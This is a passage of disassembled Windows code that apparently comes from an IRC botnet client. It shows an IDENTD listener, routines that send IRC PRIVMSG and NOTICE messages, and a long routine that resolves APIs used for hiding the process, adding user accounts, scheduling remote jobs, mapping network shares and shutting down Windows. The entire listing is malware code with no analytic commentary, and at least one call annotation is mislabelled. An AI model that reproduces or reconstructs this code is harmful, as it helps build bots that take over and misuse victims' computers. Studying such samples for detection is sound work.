; sub_409557+1807�o
Str = byte ptr -238h
Dest = byte ptr -38h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
Dst = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 238h
push ebx
push esi
push edi
push 10h
pop edi
xor esi, esi
push edi ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
mov [ebp+var_8], esi
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push 71h
call dword_42EBB4 ; htons
push esi
push 1
push 2
mov [ebp+var_1A], ax
mov [ebp+var_18], esi
call dword_42EC30 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_405DD4
mov eax, [ebp+arg_0]
push edi
imul eax, 234h
mov dword_43054C[eax], ebx
lea eax, [ebp+Dst]
push eax
push ebx
call dword_42EBE0 ; bind
cmp eax, 0FFFFFFFFh
jz loc_405DD4
push 5
push ebx
call dword_42EBDC ; listen
cmp eax, 0FFFFFFFFh
jz loc_405DD4
mov [ebp+var_C], edi
mov edi, 200h
loc_405CFE: ; CODE XREF: sub_405C73+EA�j
; sub_405C73+14A�j ...
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_2C]
push eax
push ebx
call dword_42EC44 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_405DCF
movzx eax, [ebp+var_2A]
push eax
push [ebp+var_28]
call dword_42EC3C ; inet_ntoa
push eax
lea eax, [ebp+Str]
push offset aIdentdClientCo ; "[IDENTD]: Client connection from IP: %s"...
push eax ; Dest
call _sprintf
lea eax, [ebp+Str]
push eax
call sub_402D63
add esp, 14h
lea eax, [ebp+Str]
push esi
push edi
push eax
push [ebp+var_4]
call dword_42EBCC ; recv
cmp eax, 0FFFFFFFFh
jz short loc_405CFE
lea eax, [ebp+Str]
push esi ; int
push eax ; Str
call sub_406E70
push 0Ch ; Size
lea eax, [ebp+Dest]
push esi ; Val
push eax ; Dst
call _memset
push esi ; Str1
push esi ; int
lea eax, [ebp+Dest]
push 2 ; int
push eax ; Dest
call sub_40FA38
push eax
push offset aUseridUnixS ; " : USERID : UNIX : %s\r\n"
lea eax, [ebp+Str]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 34h
lea eax, [ebp+Str]
push esi
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+var_4]
call dword_42EC00 ; send
cmp eax, 0FFFFFFFFh
jz loc_405CFE
mov [ebp+var_8], 1
jmp loc_405CFE
; ---------------------------------------------------------------------------
loc_405DCF: ; CODE XREF: sub_405C73+A0�j
cmp [ebp+var_8], esi
jnz short loc_405DFB
loc_405DD4: ; CODE XREF: sub_405C73+47�j
; sub_405C73+6B�j ...
call dword_42EB50 ; WSAGetLastError
push eax
lea eax, [ebp+Str]
push offset aIdentdErrorSer ; "[IDENTD]: Error: server failed, returne"...
push eax ; Dest
call _sprintf
lea eax, [ebp+Str]
push eax
call sub_402D63
add esp, 10h
loc_405DFB: ; CODE XREF: sub_405C73+15F�j
push ebx
call dword_42EC48 ; closesocket
push [ebp+var_4]
call dword_42EC48 ; closesocket
push [ebp+arg_0]
call sub_411F56
pop ecx
push esi
call ds:dword_41B06C ; ExitThread
pop edi
pop esi
pop ebx
sub_405C73 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_405E1E(int,char *Format,char Args)
sub_405E1E proc near ; CODE XREF: sub_4093DF+3D�p
; sub_409557+1CB�p ...
Dest = byte ptr -200h
arg_0 = dword ptr 8
Format = dword ptr 0Ch
Args = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+Args]
push eax ; Args
lea eax, [ebp+Dest]
push [ebp+Format] ; Format
push 200h ; Count
push eax ; Dest
call __vsnprintf
add esp, 10h
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_0]
call dword_42EC00 ; send
leave
retn
sub_405E1E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_405E64(int,char *Str,int,int,int)
sub_405E64 proc near ; CODE XREF: sub_4013EE+314�p
; .text:00401A07�p ...
var_400 = byte ptr -400h
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice ; "NOTICE"
jnz short loc_405E7F
mov edi, offset aPrivmsg ; "PRIVMSG"
loc_405E7F: ; CODE XREF: sub_405E64+14�j
push edi ; Str
call _strlen
push [ebp+Str] ; Str
mov esi, 1FAh
sub esi, eax
call _strlen
push [ebp+arg_8]
sub esi, eax
lea eax, [ebp+var_400]
push offset aS_2 ; "%s"
push esi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+Dest]
push [ebp+Str]
push edi
push offset aSSS ; "%s %s :%s\r\n"
push eax ; Dest
call _sprintf
add esp, 2Ch
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_0]
call dword_42EC00 ; send
cmp [ebp+arg_10], 0
pop edi
pop esi
jz short locret_405EFD
push 7D0h
call ds:dword_41B048 ; Sleep
locret_405EFD: ; CODE XREF: sub_405E64+8C�j
leave
retn
sub_405E64 endp
; =============== S U B R O U T I N E =======================================
sub_405EFF proc near ; CODE XREF: WinMain(x,x,x,x)+4B�p
push ebx
push ebp
mov ebp, ds:dword_41B0CC
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ebp ; GetModuleHandleA
mov esi, ds:dword_41B0C8
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_40601F
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; GetProcAddress
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_42EC5C, eax
call esi ; GetProcAddress
push offset aProcess32first ; "Process32First"
push edi
mov dword_42EBD4, eax
call esi ; GetProcAddress
push offset aProcess32next ; "Process32Next"
push edi
mov dword_42EBB8, eax
call esi ; GetProcAddress
push offset aModule32first ; "Module32First"
push edi
mov dword_42EAE4, eax
call esi ; GetProcAddress
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_42EA94, eax
call esi ; GetProcAddress
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_42EAC0, eax
call esi ; GetProcAddress
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_42EB30, eax
call esi ; GetProcAddress
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_42EC10, eax
call esi ; GetProcAddress
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_42EC6C, eax
call esi ; GetProcAddress
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_42EAF0, eax
call esi ; GetProcAddress
cmp dword_42EC5C, ebx
mov dword_42EAD8, eax
jz short loc_405FFD
cmp dword_42EBD4, ebx
jz short loc_405FFD
cmp dword_42EBB8, ebx
jz short loc_405FFD
cmp dword_42EAE4, ebx
jz short loc_405FFD
cmp dword_42EAC0, ebx
jz short loc_405FFD
cmp dword_42EB30, ebx
jz short loc_405FFD
cmp dword_42EC10, ebx
jz short loc_405FFD
cmp dword_42EC6C, ebx
jz short loc_405FFD
cmp dword_42EAF0, ebx
jz short loc_405FFD
cmp eax, ebx
jnz short loc_406007
loc_405FFD: ; CODE XREF: sub_405EFF+B8�j
; sub_405EFF+C0�j ...
mov dword_42EC70, 1
loc_406007: ; CODE XREF: sub_405EFF+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_42EBE8, eax
jz short loc_406034
push 1
push ebx
call eax ; GetDiskFreeSpaceExA
jmp short loc_406034
; ---------------------------------------------------------------------------
loc_40601F: ; CODE XREF: sub_405EFF+1D�j
call ds:dword_41B060 ; RtlGetLastWin32Error
mov dword_42EC74, eax
mov dword_42EC70, 1
loc_406034: ; CODE XREF: sub_405EFF+117�j
; sub_405EFF+11E�j
push offset aUser32_dll ; "user32.dll"
call ds:dword_41B0C4 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_4060EF
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; GetProcAddress
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_42EC0C, eax
call esi ; GetProcAddress
push offset aIswindow ; "IsWindow"
push edi
mov dword_42EBC0, eax
call esi ; GetProcAddress
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_42EB58, eax
call esi ; GetProcAddress
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov dword_42EC60, eax
call esi ; GetProcAddress
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_42EB84, eax
call esi ; GetProcAddress
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_42EBA4, eax
call esi ; GetProcAddress
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_42EC04, eax
call esi ; GetProcAddress
cmp dword_42EC0C, ebx
mov dword_42EB0C, eax
jz short loc_4060FA
cmp dword_42EBC0, ebx
jz short loc_4060FA
cmp dword_42EB58, ebx
jz short loc_4060FA
cmp dword_42EC60, ebx
jz short loc_4060FA
cmp dword_42EB84, ebx
jz short loc_4060FA
cmp dword_42EBA4, ebx
jz short loc_4060FA
cmp dword_42EC04, ebx
jz short loc_4060FA
cmp eax, ebx
jnz short loc_406104
jmp short loc_4060FA
; ---------------------------------------------------------------------------
loc_4060EF: ; CODE XREF: sub_405EFF+144�j
call ds:dword_41B060 ; RtlGetLastWin32Error
mov dword_42EC7C, eax
loc_4060FA: ; CODE XREF: sub_405EFF+1B8�j
; sub_405EFF+1C0�j ...
mov dword_42EC78, 1
loc_406104: ; CODE XREF: sub_405EFF+1EC�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_40629F
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; GetProcAddress
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_42EC20, eax
call esi ; GetProcAddress
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_42EB6C, eax
call esi ; GetProcAddress
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_42EBD8, eax
call esi ; GetProcAddress
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_42EAD0, eax
call esi ; GetProcAddress
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_42EB2C, eax
call esi ; GetProcAddress
cmp dword_42EC20, ebx
mov dword_42EB90, eax
jz short loc_40618F
cmp dword_42EB6C, ebx
jz short loc_40618F
cmp dword_42EBD8, ebx
jz short loc_40618F
cmp dword_42EAD0, ebx
jz short loc_40618F
cmp dword_42EB2C, ebx
jz short loc_40618F
cmp eax, ebx
jnz short loc_406199
loc_40618F: ; CODE XREF: sub_405EFF+26A�j
; sub_405EFF+272�j ...
mov dword_42EC80, 1
loc_406199: ; CODE XREF: sub_405EFF+28E�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_42EB98, eax
call esi ; GetProcAddress
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_42EB74, eax
call esi ; GetProcAddress
cmp dword_42EB98, ebx
mov dword_42EC1C, eax
jz short loc_4061D4
cmp dword_42EB74, ebx
jz short loc_4061D4
cmp eax, ebx
jnz short loc_4061DE
loc_4061D4: ; CODE XREF: sub_405EFF+2C7�j
; sub_405EFF+2CF�j
mov dword_42EC80, 1
loc_4061DE: ; CODE XREF: sub_405EFF+2D3�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; GetProcAddress
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_42EBA8, eax
call esi ; GetProcAddress
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_42EAAC, eax
call esi ; GetProcAddress
push offset aControlservice ; "ControlService"
push edi
mov dword_42EAB4, eax
call esi ; GetProcAddress
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_42EB14, eax
call esi ; GetProcAddress
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_42EB18, eax
call esi ; GetProcAddress
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_42EAC8, eax
call esi ; GetProcAddress
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_42EB78, eax
call esi ; GetProcAddress
cmp dword_42EBA8, ebx
mov dword_42EAB8, eax
jz short loc_406282
cmp dword_42EAAC, ebx
jz short loc_406282
cmp dword_42EAB4, ebx
jz short loc_406282
cmp dword_42EB14, ebx
jz short loc_406282
cmp dword_42EB18, ebx
jz short loc_406282
cmp dword_42EAC8, ebx
jz short loc_406282
cmp dword_42EB78, ebx
jz short loc_406282
cmp eax, ebx
jnz short loc_40628C
loc_406282: ; CODE XREF: sub_405EFF+34D�j
; sub_405EFF+355�j ...
mov dword_42EC80, 1
loc_40628C: ; CODE XREF: sub_405EFF+381�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_42EAB0, eax
jnz short loc_4062B4
jmp short loc_4062AA
; ---------------------------------------------------------------------------
loc_40629F: ; CODE XREF: sub_405EFF+210�j
call ds:dword_41B060 ; RtlGetLastWin32Error
mov dword_42EC84, eax
loc_4062AA: ; CODE XREF: sub_405EFF+39E�j
mov dword_42EC80, 1
loc_4062B4: ; CODE XREF: sub_405EFF+39C�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_406380
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; GetProcAddress
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov dword_42EBA0, eax
call esi ; GetProcAddress
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov dword_42EBF4, eax
call esi ; GetProcAddress
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov dword_42EBFC, eax
call esi ; GetProcAddress
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov dword_42EBBC, eax
call esi ; GetProcAddress
push offset aSelectobject ; "SelectObject"
push edi
mov dword_42EAF4, eax
call esi ; GetProcAddress
push offset aBitblt ; "BitBlt"
push edi
mov dword_42EAA4, eax
call esi ; GetProcAddress
push offset aDeletedc ; "DeleteDC"
push edi
mov dword_42EBF8, eax
call esi ; GetProcAddress
push offset aDeleteobject ; "DeleteObject"
push edi
mov dword_42EA90, eax
call esi ; GetProcAddress
cmp dword_42EBA0, ebx
mov dword_42EB24, eax
jz short loc_40638B
cmp dword_42EBF4, ebx
jz short loc_40638B
cmp dword_42EBFC, ebx
jz short loc_40638B
cmp dword_42EBBC, ebx
jz short loc_40638B
cmp dword_42EAF4, ebx
jz short loc_40638B
cmp dword_42EAA4, ebx
jz short loc_40638B
cmp dword_42EBF8, ebx
jz short loc_40638B
cmp dword_42EA90, ebx
jz short loc_40638B
cmp eax, ebx
jnz short loc_406395
jmp short loc_40638B
; ---------------------------------------------------------------------------
loc_406380: ; CODE XREF: sub_405EFF+3C0�j
call ds:dword_41B060 ; RtlGetLastWin32Error
mov dword_42EC8C, eax
loc_40638B: ; CODE XREF: sub_405EFF+441�j
; sub_405EFF+449�j ...
mov dword_42EC88, 1
loc_406395: ; CODE XREF: sub_405EFF+47D�j
mov ebp, ds:dword_41B0C4
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_406651
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; GetProcAddress
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_42EB38, eax
call esi ; GetProcAddress
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_42EC54, eax
call esi ; GetProcAddress
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_42EAE0, eax
call esi ; GetProcAddress
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_42EABC, eax
call esi ; GetProcAddress
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_42EB64, eax
call esi ; GetProcAddress
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_42EB50, eax
call esi ; GetProcAddress
push offset aSocket ; "socket"
push edi
mov dword_42EB20, eax
call esi ; GetProcAddress
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_42EC30, eax
call esi ; GetProcAddress
push offset aConnect ; "connect"
push edi
mov dword_42EC4C, eax
call esi ; GetProcAddress
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_42EB60, eax
call esi ; GetProcAddress
push offset aInet_addr ; "inet_addr"
push edi
mov dword_42EC3C, eax
call esi ; GetProcAddress
push offset aHtons ; "htons"
push edi
mov dword_42EBF0, eax
call esi ; GetProcAddress
push offset aHtonl ; "htonl"
push edi
mov dword_42EBB4, eax
call esi ; GetProcAddress
push offset aNtohs ; "ntohs"
push edi
mov dword_42EBB0, eax
call esi ; GetProcAddress
push offset aNtohl ; "ntohl"
push edi
mov dword_42EB00, eax
call esi ; GetProcAddress
push offset aSend ; "send"
push edi
mov dword_42EAF8, eax
call esi ; GetProcAddress
push offset aSendto ; "sendto"
push edi
mov dword_42EC00, eax
call esi ; GetProcAddress
push offset aRecv ; "recv"
push edi
mov dword_42EC14, eax
call esi ; GetProcAddress
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_42EBCC, eax
call esi ; GetProcAddress
mov dword_42EB8C, eax
push offset aBind ; "bind"
push edi
call esi ; GetProcAddress
push offset aSelect ; "select"
push edi
mov dword_42EBE0, eax
call esi ; GetProcAddress
push offset aListen ; "listen"
push edi
mov dword_42EB9C, eax
call esi ; GetProcAddress
push offset aAccept ; "accept"
push edi
mov dword_42EBDC, eax
call esi ; GetProcAddress
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_42EC44, eax
call esi ; GetProcAddress
push offset aGetsockname ; "getsockname"
push edi
mov dword_42EB94, eax
call esi ; GetProcAddress
push offset aGethostname ; "gethostname"
push edi
mov dword_42EB5C, eax
call esi ; GetProcAddress
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_42EBC8, eax
call esi ; GetProcAddress
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_42EC34, eax
call esi ; GetProcAddress
push offset aGetpeername ; "getpeername"
push edi
mov dword_42EB70, eax
call esi ; GetProcAddress
push offset aClosesocket ; "closesocket"
push edi
mov dword_42EB1C, eax
call esi ; GetProcAddress
cmp dword_42EB38, ebx
mov dword_42EC48, eax
jz loc_40665C
cmp dword_42EC54, ebx
jz loc_40665C
cmp dword_42EAE0, ebx
jz loc_40665C
cmp dword_42EB64, ebx
jz loc_40665C
cmp dword_42EB50, ebx
jz loc_40665C
cmp dword_42EB20, ebx
jz loc_40665C
cmp dword_42EC30, ebx
jz loc_40665C
cmp dword_42EC4C, ebx
jz loc_40665C
cmp dword_42EB60, ebx
jz loc_40665C
cmp dword_42EC3C, ebx
jz loc_40665C
cmp dword_42EBF0, ebx
jz loc_40665C
cmp dword_42EBB4, ebx
jz loc_40665C
cmp dword_42EBB0, ebx
jz loc_40665C
cmp dword_42EB00, ebx
jz short loc_40665C
cmp dword_42EC00, ebx
jz short loc_40665C
cmp dword_42EC14, ebx
jz short loc_40665C
cmp dword_42EBCC, ebx
jz short loc_40665C
cmp dword_42EB8C, ebx
jz short loc_40665C
cmp dword_42EBE0, ebx
jz short loc_40665C
cmp dword_42EB9C, ebx
jz short loc_40665C
cmp dword_42EBDC, ebx
jz short loc_40665C
cmp dword_42EC44, ebx
jz short loc_40665C
cmp dword_42EB94, ebx
jz short loc_40665C
cmp dword_42EB5C, ebx
jz short loc_40665C
cmp dword_42EBC8, ebx
jz short loc_40665C
cmp dword_42EC34, ebx
jz short loc_40665C
cmp dword_42EB70, ebx
jz short loc_40665C
cmp eax, ebx
jnz short loc_406666
jmp short loc_40665C
; ---------------------------------------------------------------------------
loc_406651: ; CODE XREF: sub_405EFF+4A7�j
call ds:dword_41B060 ; RtlGetLastWin32Error
mov dword_42EC94, eax
loc_40665C: ; CODE XREF: sub_405EFF+646�j
; sub_405EFF+652�j ...
mov dword_42EC90, 1
loc_406666: ; CODE XREF: sub_405EFF+74E�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40676B
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; GetProcAddress
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_42EB08, eax
call esi ; GetProcAddress
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_42EA98, eax
call esi ; GetProcAddress
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_42EB80, eax
call esi ; GetProcAddress
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_42EB3C, eax
call esi ; GetProcAddress
push offset aInternetopena ; "InternetOpenA"
push edi
mov dword_42EB88, eax
call esi ; GetProcAddress
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_42EB54, eax
call esi ; GetProcAddress
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_42EAD4, eax
call esi ; GetProcAddress
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_42EACC, eax
call esi ; GetProcAddress
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov dword_42EADC, eax
call esi ; GetProcAddress
cmp dword_42EB08, ebx
mov ecx, dword_42EB54
mov dword_42EBE4, eax
jz short loc_406747
cmp dword_42EA98, ebx
jz short loc_406747
cmp dword_42EB80, ebx
jz short loc_406747
cmp dword_42EB3C, ebx
jz short loc_406747
cmp dword_42EB88, ebx
jz short loc_406747
cmp ecx, ebx
jz short loc_406747
cmp dword_42EAD4, ebx
jz short loc_406747
cmp dword_42EACC, ebx
jz short loc_406747
cmp dword_42EADC, ebx
jz short loc_406747
cmp eax, ebx
jnz short loc_406751
loc_406747: ; CODE XREF: sub_405EFF+806�j
; sub_405EFF+80E�j ...
mov dword_42EC98, 1
loc_406751: ; CODE XREF: sub_405EFF+846�j
cmp ecx, ebx
jz short loc_406786
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; InternetOpenA
cmp eax, ebx
mov dword_42EB68, eax
jnz short loc_406786
jmp short loc_406780
; ---------------------------------------------------------------------------
loc_40676B: ; CODE XREF: sub_405EFF+772�j
call ds:dword_41B060 ; RtlGetLastWin32Error
mov dword_42EC9C, eax
mov dword_42EC98, 1
loc_406780: ; CODE XREF: sub_405EFF+86A�j
mov dword_42EB68, ebx
loc_406786: ; CODE XREF: sub_405EFF+854�j
; sub_405EFF+868�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4067D0
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; GetProcAddress
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov dword_42EB48, eax
call esi ; GetProcAddress
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov dword_42EC68, eax
call esi ; GetProcAddress
cmp dword_42EB48, ebx
mov dword_42EAE8, eax
jz short loc_4067DB
cmp dword_42EC68, ebx
jz short loc_4067DB
cmp eax, ebx
jnz short loc_4067E5
jmp short loc_4067DB
; ---------------------------------------------------------------------------
loc_4067D0: ; CODE XREF: sub_405EFF+892�j
call ds:dword_41B060 ; RtlGetLastWin32Error
mov dword_42ECA4, eax
loc_4067DB: ; CODE XREF: sub_405EFF+8C1�j
; sub_405EFF+8C9�j ...
mov dword_42ECA0, 1
loc_4067E5: ; CODE XREF: sub_405EFF+8CD�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_4068DB
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; GetProcAddress
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_42EAC4, eax
call esi ; GetProcAddress
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_42EAA0, eax
call esi ; GetProcAddress
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_42EB10, eax
call esi ; GetProcAddress
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_42EB40, eax
call esi ; GetProcAddress
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_42EC40, eax
call esi ; GetProcAddress
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_42EAFC, eax
call esi ; GetProcAddress
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_42EAA8, eax
call esi ; GetProcAddress
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_42EA9C, eax
call esi ; GetProcAddress
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_42EB28, eax
call esi ; GetProcAddress
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_42EC08, eax
call esi ; GetProcAddress
cmp dword_42EAC4, ebx
mov dword_42EBC4, eax
jz short loc_4068E6
cmp dword_42EAA0, ebx
jz short loc_4068E6
cmp dword_42EB10, ebx
jz short loc_4068E6
cmp dword_42EB40, ebx
jz short loc_4068E6
cmp dword_42EC40, ebx
jz short loc_4068E6
cmp dword_42EAFC, ebx
jz short loc_4068E6
cmp dword_42EAA8, ebx
jz short loc_4068E6
cmp dword_42EA9C, ebx
jz short loc_4068E6
cmp dword_42EB28, ebx
jz short loc_4068E6
cmp dword_42EC08, ebx
jz short loc_4068E6
cmp eax, ebx
jnz short loc_4068F0
jmp short loc_4068E6
; ---------------------------------------------------------------------------
loc_4068DB: ; CODE XREF: sub_405EFF+8F1�j
call ds:dword_41B060 ; RtlGetLastWin32Error
mov dword_42ECAC, eax
loc_4068E6: ; CODE XREF: sub_405EFF+98C�j
; sub_405EFF+994�j ...
mov dword_42ECA8, 1
loc_4068F0: ; CODE XREF: sub_405EFF+9D8�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406925
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; GetProcAddress
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_42EAEC, eax
call esi ; GetProcAddress
cmp dword_42EAEC, ebx
mov dword_42EBAC, eax
jz short loc_406930
cmp eax, ebx
jnz short loc_40693A
jmp short loc_406930
; ---------------------------------------------------------------------------
loc_406925: ; CODE XREF: sub_405EFF+9FC�j
call ds:dword_41B060 ; RtlGetLastWin32Error
mov dword_42ECB4, eax
loc_406930: ; CODE XREF: sub_405EFF+A1E�j
; sub_405EFF+A24�j
mov dword_42ECB0, 1
loc_40693A: ; CODE XREF: sub_405EFF+A22�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40696F
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; GetProcAddress
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_42EC2C, eax
call esi ; GetProcAddress
cmp dword_42EC2C, ebx
mov dword_42EC28, eax
jz short loc_40697A
cmp eax, ebx
jnz short loc_406984
jmp short loc_40697A
; ---------------------------------------------------------------------------
loc_40696F: ; CODE XREF: sub_405EFF+A46�j
call ds:dword_41B060 ; RtlGetLastWin32Error
mov dword_42ECBC, eax
loc_40697A: ; CODE XREF: sub_405EFF+A68�j
; sub_405EFF+A6E�j
mov dword_42ECB8, 1
loc_406984: ; CODE XREF: sub_405EFF+A6C�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4069E3
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; GetProcAddress
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_42EC58, eax
call esi ; GetProcAddress
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_42EC50, eax
call esi ; GetProcAddress
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_42EC18, eax
call esi ; GetProcAddress
cmp dword_42EC58, ebx
mov dword_42EB04, eax
jz short loc_4069EE
cmp dword_42EC50, ebx
jz short loc_4069EE
cmp dword_42EC18, ebx
jz short loc_4069EE
cmp eax, ebx
jnz short loc_4069F8
jmp short loc_4069EE
; ---------------------------------------------------------------------------
loc_4069E3: ; CODE XREF: sub_405EFF+A90�j
call ds:dword_41B060 ; RtlGetLastWin32Error
mov dword_42ECC4, eax
loc_4069EE: ; CODE XREF: sub_405EFF+ACC�j
; sub_405EFF+AD4�j ...
mov dword_42ECC0, 1
loc_4069F8: ; CODE XREF: sub_405EFF+AE0�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406A2D
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; GetProcAddress
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_42EB34, eax
call esi ; GetProcAddress
